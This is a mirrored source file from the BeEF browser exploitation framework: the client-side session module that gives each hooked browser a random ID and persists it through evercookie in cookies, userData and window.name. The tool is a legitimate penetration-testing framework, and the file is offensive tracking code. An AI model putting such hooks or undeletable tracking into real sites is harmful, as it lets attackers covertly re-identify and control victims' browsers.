Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/core/main/client/session.js
1154 views
1
//

2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
/**

8
 * Provides basic session functions.

9
 * @namespace beef.session

10
 */

11
beef.session = {

12
	

13
	hook_session_id_length: 80,

14
	hook_session_id_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",	

15
	ec: new evercookie(),

16
    beefhook: "<%= @hook_session_name %>",

17
	

18
	/**

19
	 * Gets a string which will be used to identify the hooked browser session

20
	 * 

21
	 * @example: var hook_session_id = beef.session.get_hook_session_id();

22
	 */

23
  	get_hook_session_id: function() {

24
		// check if the browser is already known to the framework

25
		var id = this.ec.evercookie_cookie(beef.session.beefhook);

26
		if (typeof id == 'undefined') {

27
			var id = this.ec.evercookie_userdata(beef.session.beefhook);

28
		}

29
		if (typeof id == 'undefined') {

30
			var id = this.ec.evercookie_window(beef.session.beefhook);

31
		}

32
		

33
		// if the browser is not known create a hook session id and set it

34
		if ((typeof id == 'undefined') || (id == null)) {

35
			id = this.gen_hook_session_id();

36
			this.set_hook_session_id(id);

37
		}

38
		

39
		// return the hooked browser session identifier

40
		return id;

41
	},

42
	

43
	/**

44
	 * Sets a string which will be used to identify the hooked browser session

45
	 * 

46
	 * @example: beef.session.set_hook_session_id('RANDOMSTRING');

47
	 */

48
  	set_hook_session_id: function(id) {

49
		// persist the hook session id

50
		this.ec.evercookie_cookie(beef.session.beefhook, id);

51
		this.ec.evercookie_userdata(beef.session.beefhook, id);

52
		this.ec.evercookie_window(beef.session.beefhook, id);

53
	},

54
	

55
	/**

56
	 * Generates a random string using the chars in hook_session_id_chars.

57
	 * 

58
	 * @example: beef.session.gen_hook_session_id();

59
	 */

60
  	gen_hook_session_id: function() {

61
	    // init the return value

62
		var hook_session_id = "";

63
		

64
		// construct the random string 

65
		for(var i=0; i<this.hook_session_id_length; i++) {

66
		  var rand_num = Math.floor(Math.random()*this.hook_session_id_chars.length);

67
		  hook_session_id += this.hook_session_id_chars.charAt(rand_num);

68
		}

69
		

70
		return hook_session_id;

71
	}

72
};

73


74
beef.regCmp('beef.session');

75


76